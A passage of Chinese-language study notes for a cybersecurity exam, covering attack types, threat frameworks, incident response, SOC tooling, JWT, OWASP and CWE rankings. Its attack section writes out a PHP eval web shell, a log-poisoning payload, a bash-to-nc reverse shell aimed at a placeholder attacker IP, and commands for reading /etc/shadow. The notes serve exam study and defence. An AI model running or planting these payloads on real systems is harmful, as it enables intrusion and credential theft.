|:-----|:-----|:-----------| | `whoami` | 查詢當前使用者身分 | 確認取得的權限等級 | | `id` / `groups` | 查詢使用者所屬群組 | 判斷可存取的資源 | | `uname -a` | 查詢作業系統版本 | 尋找已知的核心漏洞 | | `find / -perm -u=s -type f` | 尋找有 **SUID** 權限的檔案 | SUID 提權(以檔案擁有者身分執行) | | `cat /etc/passwd` | 列舉系統帳號資訊 | 取得帳號清單(**不含密碼**) | | `cat /etc/shadow` | 讀取密碼雜湊(需 root) | 離線破解密碼 | > `/etc/passwd` 存帳號資訊(公開可讀),`/etc/shadow` 存密碼雜湊(僅 root 可讀) ### Linux 持久化(Persistence)技巧 | 技巧 | 說明 | |:-----|:-----| | 寫入 `~/.bashrc` | 使用者登入時自動觸發(如反向 Shell) | | 寫入 `crontab` | 定期執行惡意程式 | | 寫入 `~/.ssh/authorized_keys` | 免密碼 SSH 登入(注意:不是 `known_hosts`) | | Web Shell | 上傳一句話木馬(如 `<?php @eval($_REQUEST["input"]);?>`) | --- ### 網路攻擊 | 攻擊 | 原理 | 防護 | |:-----|:-----|:-----| | DoS/DDoS | 消耗資源使服務不可用 | 流量清洗、CDN、速率限制 | | SYN Flood | 大量半開連線耗盡資源 | SYN Cookie | | ARP Spoofing | 偽造 ARP 回應,攔截流量 | DAI | | DNS Spoofing | 偽造 DNS 回應,導向惡意網站 | DNSSEC | | MITM | 插入通訊雙方之間竊聽/篡改 | HTTPS、HSTS、憑證釘選 | | Buffer Overflow | 輸入超過緩衝區大小,覆寫記憶體執行惡意程式碼 | 邊界檢查、ASLR、DEP、安全函數 | --- ### 應用程式攻擊 | 攻擊 | 原理 | 防護 | |:-----|:-----|:-----| | SQL Injection | 注入 SQL 語句操控資料庫 | 參數化查詢、輸入驗證、最小權限 | | XSS | 注入惡意腳本於網頁 | Output Encoding、CSP、HttpOnly Cookie | | CSRF | 利用已登入身分執行非預期操作 | CSRF Token、SameSite Cookie | | SSRF | 利用伺服器連內網或雲端 Metadata | 白名單驗證、禁止內網存取 | | Command Injection | 注入系統指令 | 白名單、參數化、安全 API | | LFI | 透過參數載入本地檔案(如日誌、設定檔) | 白名單驗證、禁止使用者控制檔案路徑 | ### Log Poisoning + LFI 攻擊鏈 **攻擊流程**: 1. 攻擊者以惡意 PHP 程式碼作為 SSH 登入帳號(如 `<?php system($_GET[c]); ?>`) 2. 登入失敗,但「帳號」被寫入系統日誌(如 /var/log/auth.log) 3. 攻擊者透過 LFI 漏洞載入該日誌檔 4. 伺服器解析日誌中的 PHP 程式碼並執行 5. 攻擊者透過參數(如 ?c=whoami)遠端執行任意指令 > 關鍵識別特徵:日誌中出現 `<?php` 語法作為使用者名稱 ### Reverse Shell(反向 Shell) | 項目 | 說明 | |:-----|:-----| | 原理 | 受害主機**主動連線**到攻擊者控制的機器 | | 目的 | 繞過防火牆 Inbound 限制,讓攻擊者遠端下指令 | | 常見指令 | `/bin/bash -i 2>&1 \| nc <攻擊者IP> <Port>` | | 偵測方式 | 監控異常的 Outbound 連線、檢查 crontab 與 .bashrc | --- ### 逆向工程(Reverse Engineering)與混淆(Obfuscation) > ⚠️ 注意這跟「Reverse Shell」(反向 Shell)完全不同 — 反向 Shell 是攻擊者連線手法、Reverse Engineering 是分析程式內部。 #### 逆向工程 - **定義**:把已編譯的程式(.exe / .apk / .ipa)反推回**接近原始碼**的形式,分析其行為 - **攻擊者用途**:破解授權、找漏洞、偷演算法、分析惡意程式 - **防禦方用途**:分析惡意程式樣本、行動 App 安全檢測 #### Obfuscation 混淆(對抗逆向工程) 軟體開發者用「混淆」讓程式碼**難以閱讀**,提高逆向成本(注意:不是加密,只是讓人看不懂)。 | 混淆手法 | 範例 | |:-----|:-----| | 變數名打亂 | `getUserPassword` → `_a1b2c3` | | 控制流扭曲 | 加大量無意義跳轉、假 if-else | | 字串加密 | `"password"` 在執行時才解密 | | 反組譯陷阱 | 加入特殊指令讓反組譯工具崩潰 | > 💡 **記憶法**:加密是「鎖起來」(沒鑰匙打不開),混淆是「丟到資源回收堆」(東西還在,但很難找)。 #### 常見題型 - 「逆向工程」**不屬於**安全檢測項目(它是攻擊者技術,App 安全檢測指掃描漏洞) - 「混淆」目的是**提高反組譯難度**,不是壓縮體積、不是加密保護 > 📌 **與滲透測試區別**:滲透測試是「黑箱對外攻擊」,逆向工程是「白箱對內部解讀」。 --- ### 憑證相關攻擊 | 攻擊 | 中文 | 原理 | 防護 | |:-----|:-----|:-----|:-----| | Credential Harvesting | 憑證收集 | 釣魚假登入頁騙取帳密 | 安全意識訓練、MFA | | Credential Stuffing | 憑證填充(撞庫) | 用外洩帳密撞其他網站 | OTP、MFA、2FA | | Brute Force | 暴力破解 | 暴力猜測密碼 | 密碼複雜度、帳號鎖定、CAPTCHA | | Password Spraying | 密碼噴灑 | 用常見密碼對大量帳號嘗試 | 帳號鎖定、MFA | --- ### 社交工程 | 手法 | 中文 | 說明 | |:-----|:-----|:-----| | Phishing | 網路釣魚 | 偽造郵件/網站騙取資訊 | | Spear Phishing | 魚叉式釣魚 | 針對特定對象的釣魚 | | Whaling | 鯨釣(捕鯨) | 針對高階主管 | | Vishing | 語音釣魚 | 透過電話詐騙 | | Smishing | 簡訊釣魚 | 透過簡訊詐騙 | | Tailgating | 尾隨進入 | 跟隨授權人員進入管制區 | | Pretexting | 假冒身分 | 編造身分騙取信任 | | Deepfake | 深度偽造 | 深度偽造影音冒充身分 | **防禦策略**: - 安全意識訓練 - 獨立驗證管道:高風險指令透過另一管道確認 - SOD + 多重審批:敏感操作需多人核准 --- ### 惡意程式 | 類型 | 英文 | 特性 | |:-----|:-----|:-----| | 病毒 | Virus | 需宿主程式,會自我複製 | | 蠕蟲 | Worm | 獨立運作,透過網路傳播 | | 木馬 | Trojan | 偽裝成正常程式,不自我複製 | | 勒索軟體 | Ransomware | 加密檔案,要求贖金 | | 間諜軟體 | Spyware | 監控使用者行為 | | Rootkit | Rootkit | 隱藏自身,取得系統控制權 | | 後門 | Backdoor | 繞過正常認證的存取管道 | --- ### 勒索軟體 **勒索軟體防護措施**: - 多層備份策略(3-2-1 原則:3 份備份、2 種媒體、1 份異地) - 備份系統與主網分離(避免備份被一起刪除) - 應用程式白名單 - 零信任架構(限制橫向移動) - 網路區隔 - 使用者教育訓練 - EDR / 行為偵測 --- ### 威脅框架 **MITRE ATT&CK(TTP)** - Tactic(戰術):攻擊目的(如 Initial Access、Persistence) - Technique(技術):攻擊手段(如 Phishing、Valid Accounts) - Procedure(程序):具體實作方式(如 APT29 使用特定釣魚郵件) | 戰術 | 中文 | 說明 | |:-----|:-----|:-----| | Reconnaissance | 偵察 | 蒐集目標資訊 | | Resource Development | 資源開發 | 開發/取得攻擊資源 | | Initial Access | 初始存取 | 首次進入目標系統 | | Execution | 執行 | 執行惡意程式 | | Persistence | 持久化 | 維持存取權 | | Defense Evasion | 防禦規避 | 規避防禦偵測 | | Credential Access | 憑證存取 | 竊取憑證 | | Lateral Movement | 橫向移動 | 在內網擴散到其他系統 | | Exfiltration | 資料竊取 | 將資料傳送到外部 | | Impact | 衝擊 | 破壞、加密、癱瘓 | **Cyber Kill Chain(網路攻擊鏈)** | 階段 | 英文 | 中文 | 說明 | |:----:|:-----|:-----|:-----| | 1 | Reconnaissance | 偵察 | 蒐集目標情報(如 OSINT、掃描) | | 2 | Weaponization | 武器化 | 製作攻擊工具(如惡意文件、Exploit) | | 3 | Delivery | 遞送 | 將武器傳遞給目標(如釣魚郵件、USB) | | 4 | Exploitation | 利用 | 觸發漏洞取得執行權限 | | 5 | Installation | 安裝 | 植入惡意程式(如 Backdoor、Web Shell) | | 6 | Command & Control | 命令與控制(C2) | 建立遠端控制通道 | | 7 | Actions on Objectives | 目標行動 | 達成最終目的(竊資、破壞、勒索) | --- > 📝 **本節相關題目共 29 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#31-弱點威脅分類與攻擊手法) ## 3.2 防護與應變實務 ### 網路安全設備 **防火牆類型**: | 類型 | 層級 | 特性 | |------|------|------| | 封包過濾 | L3-L4 | 檢查 IP/Port | | 狀態檢測 | L3-L4 | 追蹤連線狀態 | | 應用層閘道 | L7 | 完整檢查內容 | | NGFW | L3-L7 | 整合 IPS、應用識別 | | WAF | L7 | 專防 Web 攻擊(SQLi、XSS),規則可被繞過 | **IDS vs IPS**: | 項目 | IDS | IPS | |------|-----|-----| | 功能 | 偵測並告警 | 偵測並阻擋 | | 部署 | 旁路監聽 | 串接 | **偵測方法**: - Signature-based:準確但無法偵測未知攻擊 - Anomaly-based:可偵測未知攻擊但誤報較高 **Honeypot / Honeynet(蜜罐/蜜網)**:模擬假目標吸引攻擊者,用於偵測、分析攻擊行為 ### DNS Sinkhole(DNS 黑洞) | 項目 | 說明 | |:-----|:-----| | 原理 | 將惡意網域的 DNS 解析導向內部控制的 IP | | 效果 | 阻斷惡意連線(如 C2 通訊),不影響正常服務 | | 適用情境 | SOC 偵測到大量可疑 DNS 查詢(如 *.onion)時的即時防禦 | | 與防火牆封鎖差異 | 封鎖 53 埠會影響所有 DNS;Sinkhole 只影響特定惡意網域 | ### 端點安全 | 技術 | 說明 | 特點 | |:-----|:-----|:-----| | 傳統防毒 | 特徵碼比對 | 無法偵測未知威脅 | | EDR | 端點偵測與回應 | 行為分析、可偵測未知威脅、支援事件調查 | **EDR 核心功能**: - 行為偵測(非特徵碼) - 即時監控端點活動 - 威脅獵捕(Threat Hunting) - 事件調查與回應 **EDR 告警處理**:隔離端點網路、擷取 RAM、製作磁碟鑑識映像 **事件處理流程(NIST SP 800-61)** | 階段 | 英文 | 中文 | 說明 | |:----:|:-----|:-----|:-----| | 1 | Preparation | 準備 | 建立事件處理能力、工具、程序 | | 2 | Identification | 識別 | 偵測並確認是否為資安事件 | | 3 | Containment | 遏制 | 隔離受影響系統,防止擴散 | | 4 | Eradication | 根除 | 移除惡意程式、修補漏洞 | | 5 | Recovery | 復原 | 恢復系統正常運作 | | 6 | Lessons Learned | 檢討 | 事後檢討、改善程序 | > 💡 **事件確認後首要動作是遏制(Containment)**,不是根除也不是復原。先止血再治療。 ### 數位鑑識 **證據揮發性順序**(優先蒐集): 1. CPU 暫存器/快取 2. RAM(記憶體) 3. 網路連線狀態 4. 執行中程序 5. 硬碟 6. 備份媒體 **完整性驗證**:製作鏡像並計算 Hash **監管鏈(Chain of Custody)**:記錄證據移轉過程 ### 營運持續與災難復原 | 計畫 | 英文 | 範圍 | |:-----|:-----|:-----| | BCP | Business Continuity Plan | 組織整體業務運營持續 | | DRP | Disaster Recovery Plan | 資訊技術系統的恢復 | | ISCP | Information System Contingency Plan | 特定資訊系統的應急反應 | > 範圍大小:BCP(整體業務)> DRP(IT 系統)> ISCP(特定系統) **BIA(Business Impact Analysis,業務衝擊分析)**: - 核心目標:確定關鍵業務流程、評估資源中斷的影響、設定復原優先級 - 產出:RTO(復原時間目標)、RPO(復原點目標)、關鍵資源清單 --- > 📝 **本節相關題目共 9 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#32-防護與應變實務) ## 4.1 安全維運 ### SecOps(Security Operations,現代化資安維運) 從「人工監控 SIEM」走向「自動化 + AI 輔助」的維運模式。 #### 基礎四件套(已過時但仍常考定義) | 元素 | 說明 | |:-----|:-----| | SIEM(資安資訊與事件管理) | 多源日誌收集、關聯分析、告警 | | SOAR(資安編排自動化回應) | 把告警處理流程自動化(如:勒索告警 → 自動隔離主機) | | 威脅情資 | 外部 IoC / TTP 情資支援判斷 | | SOC | 人員團隊持續監控 | #### 進階工具族(2024 後新題型,**最值得加強**) | 工具 | 全名 | 解決什麼問題 | |:-----|:-----|:-----| | **EDR** | Endpoint Detection & Response | 端點行為偵測(已在 1.3 章說明) | | **NDR** | Network Detection & Response | 網路流量行為偵測 | | **XDR** | Extended Detection & Response | 整合 EDR + NDR + 雲端 + 身分,跨域關聯 | | **MDR** | Managed Detection & Response | 委外給 SOC 廠商 24/7 監控 | | **UEBA** | User & Entity Behavior Analytics | 用 AI 比對「使用者平常行為」找異常 | | **PAM** | Privileged Access Management | 特權帳號管理(已在 1.2 章說明) | | **IGA** | Identity Governance & Administration | 身分生命週期管理(申請/變動/離職) | | **EASM** | External Attack Surface Management | 從外部視角掃描公司哪些資產暴露 | | **CSPM** | Cloud Security Posture Management | 雲端組態錯誤偵測(如 S3 桶設成 public) | | **BAS** | Breach & Attack Simulation | 持續模擬攻擊驗證防禦能力 | #### 命題趨勢辨析(常考組合題) | 情境 | 對應工具 | |:-----|:-----| | 端點行為異常但網路沒事 | EDR(NDR 看不到端點) | | 想用一個工具看跨域威脅 | XDR | | 公司沒人 24/7 守 SOC | MDR(委外) | | 員工權限不知為何越來越大 | IGA(權限蔓延管理) | | 雲端設定常出包 | CSPM | | 想知道對外有多少資產暴露 | EASM | | 想驗證「現在的防禦真的擋得住」 | BAS | > 💡 **記憶法**:把 EDR 想成「保全在大樓裡」、NDR「監視大樓門口」、XDR「整合 CCTV + 門口 + 大樓 + 雲端」、MDR「請保全公司代管」、UEBA「比對誰跟平常不一樣」。 ### 日誌管理 **時間同步(NTP)**:確保各系統時間一致,日誌時序正確才能有效進行事件關聯分析 **Windows Event ID**: | Event ID | 意義 | |:---------|:-----| | 4624 | 登入成功 | | 4625 | 登入失敗 | | 1102 | 日誌被清除 | | 4720 | 新帳號建立 | **Syslog 嚴重度**(數字越小越嚴重): | 等級 | 名稱 | |:-----|:-----| | 0 | Emergency | | 1 | Alert | | 2 | Critical | | 3 | Error | | 4 | Warning | | 5 | Notice | | 6 | Informational | | 7 | Debug | ### SIEM 功能:日誌收集、正規化、即時關聯分析、告警、合規報表 **SIEM 日誌收集方式**: | 方式 | 說明 | |:-----|:-----| | Syslog | 標準日誌協定,Linux/網路設備原生支援 | | Agent-Based | 安裝代理程式收集並傳送 | | WEF | Windows Event Forwarding,Windows 原生功能 | | API | 透過 API 整合雲端服務日誌 | ### SIEM **功能**: - 收集企業內外日誌、警報、事件 - 事件關聯分析、行為分析、異常偵測 - 依規則進行事件識別、分析和報警 - 事件儲存、查詢、報表生成、調查和取證 ### SOC 運作 **功能**: - 持續監控企業資訊系統、網路和應用 - 識別並即時回應安全事件 - 提供資安事件報告、紀錄、追蹤、分析和統計 > ⚠️ SOC 需要多種工具配合(SIEM、EDR、IDS 等),非單一產品能達成 ### SOAR **SOAR(Security Orchestration, Automation, and Response)**: | 功能 | 說明 | |:-----|:-----| | Orchestration(編排) | 整合多種資安工具協同運作 | | Automation(自動化) | 自動執行重複性任務 | | Response(回應) | 自動化事件回應流程 | ### 威脅情資(Threat Intelligence) **情資內容**: - 攻擊手法、漏洞利用方式 - 事件造成之實際損害或潛在負面影響 - IoC(Indicator of Compromise):惡意 IP、Hash、網域 **ISAC(資訊分享與分析中心)**: | ISAC | 適用對象 | |:-----|:---------| | F-ISAC | 金融業 | | H-ISAC | 醫療業 | | TWCERT/CC | 一般企業 | **TLP(Traffic Light Protocol,紅綠燈協定)**: | 等級 | 分享範圍 | |:-----|:---------| | TLP:RED | 僅限收件者本人,不得進一步揭露 | | TLP:AMBER | 組織內部使用,必要時可分享給客戶 | | TLP:GREEN | 可於相關社群內散播 | | TLP:CLEAR | 無限制,可公開散播 | --- > 📝 **本節相關題目共 14 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#41-安全維運) ## 4.2 滲透測試、源碼測試、資安健診 ### 弱點修補 **弱點修補管理流程**: 1. 弱點掃描 2. 評估:風險等級、實際影響程度、是否有已知 Exploit、停機對業務影響 3. 排定修補優先序與時程 4. 測試與部署修補 5. 驗證修補成效 > ⚠️ 即使無官方 Patch,仍應評估緩解措施(如關閉服務、網路隔離) ### 測試類型 | 類型 | 測試者知識 | 特點 | |------|------------|------| | 黑箱 | 無內部資訊 | 模擬真實攻擊 | | 白箱 | 完整資訊 | 涵蓋率高 | | 灰箱 | 部分資訊 | 平衡效率與真實性 | ### 檢測技術 | 技術 | 說明 | 時機 | |------|------|------| | SAST(靜態) | 掃原始碼 | 開發初期 | | DAST(動態) | 測執行中應用 | 測試/正式環境 | | IAST(互動) | 結合 SAST + DAST | 測試環境 | | SCA(組成分析) | 掃第三方元件漏洞 | 整合 SBOM | **自動化工具侷限**:對客製化商業邏輯理解有限,需搭配人工測試 ### JWT(JSON Web Token)安全 #### JWT 結構(三段,用 . 分隔) ``` xxxxx.yyyyy.zzzzz ↑ ↑ ↑ Header.Payload.Signature ``` | 段落 | 內容 | 編碼方式 | |:-----|:-----|:-----| | Header | 簽章演算法、Token 類型 | Base64 | | Payload | 使用者資訊、過期時間、權限 | Base64(**未加密** — 任何人可讀) | | Signature | 用密鑰對前兩段簽章 | HMAC / RSA | > ⚠️ **Payload 是 Base64,不是加密**。攻擊者拿到 JWT 可以直接看到內容,**不要把敏感資料寫進 Payload**。 #### 簽章演算法(常考) | 演算法 | 全名 | 類型 | 場景 | |:-----|:-----|:-----|:-----| | **HS256** | HMAC-SHA-256 | 對稱式(共用密鑰) | 內部系統,單方簽發 | | **RS256** | RSA-SHA-256 | 非對稱式(私鑰簽章 / 公鑰驗證) | 跨組織、第三方驗證 | | ❌ none | 無簽章 | — | **絕對禁用**,任何 JWT 都會通過 | #### 常見攻擊與防護 | 攻擊 | 原理 | 防護 | |:-----|:-----|:-----| | Algorithm 為 none | 改 Header 的 alg 為 none 騙過驗證 | 後端強制檢查 alg 必須為核可清單 | | 弱密鑰暴力破解 | HS256 用簡單密鑰被破 | 密鑰至少 256 bit 隨機 | | Token 沒有過期時間 | 偷到 Token 永久有效 | 設定 exp(短效期)+ Refresh Token | | 敏感資料寫在 Payload | 攻擊者解碼直接看到 | Payload 只放 ID,敏感資料另查 | > 📌 **OWASP Top 10 對應**:JWT 安全屬 A07 Identification and Authentication Failures。 ### OWASP Top 10(2025) > ⚠️ **版本注意**:本筆記收錄 2025 版排名,但部分考題仍引用 **2021 版**編號。建議確認考試簡章採用哪個版本。 **2021 → 2025 主要變動**: | 2021 版 | 2025 版 | 變動 | |:--------|:--------|:-----| | A03 Injection | A05 Injection | 排名下降 | | A05 Security Misconfiguration | A02 Security Misconfiguration | 排名上升 | | A06 Vulnerable and Outdated Components | A03 Software Supply Chain Failures | 改名擴大 | | A10 SSRF | 併入 A01 Broken Access Control | 不再獨立 | | — | A10 Mishandling of Exceptional Conditions | 新增(社群票選) | | 排名 | 弱點 | 備註 | |:-----|:-----|:-----| | A01 | Broken Access Control | 含 SSRF(原 A10 併入) | | A02 | Security Misconfiguration | 從 #5 上升 | | A03 | Software Supply Chain Failures | 新(取代 Vulnerable Components) | | A04 | Cryptographic Failures | | | A05 | Injection | | | A06 | Insecure Design | 社群票選 | | A07 | Identification and Authentication Failures | | | A08 | Software and Data Integrity Failures | | | A09 | Security Logging and Monitoring Failures | | | A10 | Mishandling of Exceptional Conditions | 新、社群票選 | > 8 個來自統計數據,2 個來自社群票選(A06、A10) ### CWE Top 25(2025) | 排名 | CWE ID | 弱點名稱 | 簡稱 | KEV 數 | |:-----|:-------|:---------|:-----|:-------| | 1 | CWE-79 | Improper Neutralization of Input During Web Page Generation | XSS | 7 | | 2 | CWE-89 | Improper Neutralization of Special Elements used in an SQL Command | SQL Injection | 4 | | 3 | CWE-352 | Cross-Site Request Forgery | CSRF | 0 | | 4 | CWE-862 | Missing Authorization | 缺少授權 | 0 | | 5 | CWE-787 | Out-of-bounds Write | 越界寫入 | 12 | | 6 | CWE-22 | Improper Limitation of a Pathname to a Restricted Directory | Path Traversal | 10 | | 7 | CWE-416 | Use After Free | 釋放後使用 | 14 | | 8 | CWE-125 | Out-of-bounds Read | 越界讀取 | 3 | | 9 | CWE-78 | Improper Neutralization of Special Elements used in an OS Command | OS Command Injection | 20 | | 10 | CWE-94 | Improper Control of Generation of Code | Code Injection | 7 | | 11 | CWE-120 | Buffer Copy without Checking Size of Input | Classic Buffer Overflow | 0 | | 12 | CWE-434 | Unrestricted Upload of File with Dangerous Type | 危險檔案上傳 | 4 | | 13 | CWE-476 | NULL Pointer Dereference | 空指標解參考 | 0 | | 14 | CWE-121 | Stack-based Buffer Overflow | 堆疊緩衝區溢位 | 4 | | 15 | CWE-502 | Deserialization of Untrusted Data | 不安全反序列化 | 11 | | 16 | CWE-122 | Heap-based Buffer Overflow | 堆積緩衝區溢位 | 6 | | 17 | CWE-863 | Incorrect Authorization | 授權不正確 | 4 | | 18 | CWE-20 | Improper Input Validation | 輸入驗證不當 | 2 | | 19 | CWE-284 | Improper Access Control | 存取控制不當 | 1 | | 20 | CWE-200 | Exposure of Sensitive Information to an Unauthorized Actor | 敏感資訊洩露 | 1 | | 21 | CWE-306 | Missing Authentication for Critical Function | 關鍵功能缺少驗證 | 11 | | 22 | CWE-918 | Server-Side Request Forgery | SSRF | 0 | | 23 | CWE-77 | Improper Neutralization of Special Elements used in a Command | Command Injection | 2 | | 24 | CWE-639 | Authorization Bypass Through User-Controlled Key | IDOR | 0 | | 25 | CWE-770 | Allocation of Resources Without Limits or Throttling | 資源耗盡 | 0 | > **KEV**:Known Exploited Vulnerabilities,表示該類弱點已有實際被利用的漏洞數量 > > **2025 新進榜**:CWE-120(#11)、CWE-121(#14)、CWE-122(#16)、CWE-284(#19) > > CWE Top 25 與 OWASP Top 10 互補:CWE 偏向底層程式碼弱點分類,OWASP 偏向 Web 應用風險情境 --- ### 安全開發(SSDLC) | 階段 | 英文 | 安全活動 | |:-----|:-----|:---------| | 需求 | Requirements | 安全需求分析 | | 設計 | Design | 威脅建模(Threat Modeling) | | 開發 | Development | 安全編碼、程式碼審查(SAST)、第三方元件檢測(SCA) | | 測試 | Testing | 滲透測試、弱點掃描(DAST)、互動式測試(IAST) | | 部署 | Deployment | 安全組態、環境強化(Hardening) | | 維運 | Operations | 監控、修補管理、WAF | **安全編碼原則**: | 攻擊類型 | 防禦方式 | |:---------|:---------| | XSS | Filter Input + Escape Output | | SQL Injection | Prepared Statement(參數化查詢)+ 輸入過濾 | | Command Injection | 白名單驗證、避免直接串接系統指令 | | 檔案上傳 | 限制副檔名、專屬目錄、設定不可執行 | > ⚠️ **前端驗證不可靠**:攻擊者可繞過前端直接發送請求,驗證必須在後端執行 ### 威脅建模(Threat Modeling) | 模型 | 說明 | |:-----|:-----| | STRIDE | 微軟提出,識別六大威脅類型 | | DREAD | 風險評分模型 | | VAST | 視覺化、敏捷式威脅建模 | --- > 📝 **本節相關題目共 18 題** → [前往題庫對應章節](https://hackmd.io/@hiiii/rk0t2YmaWe#42-滲透測試源碼測試資安健診)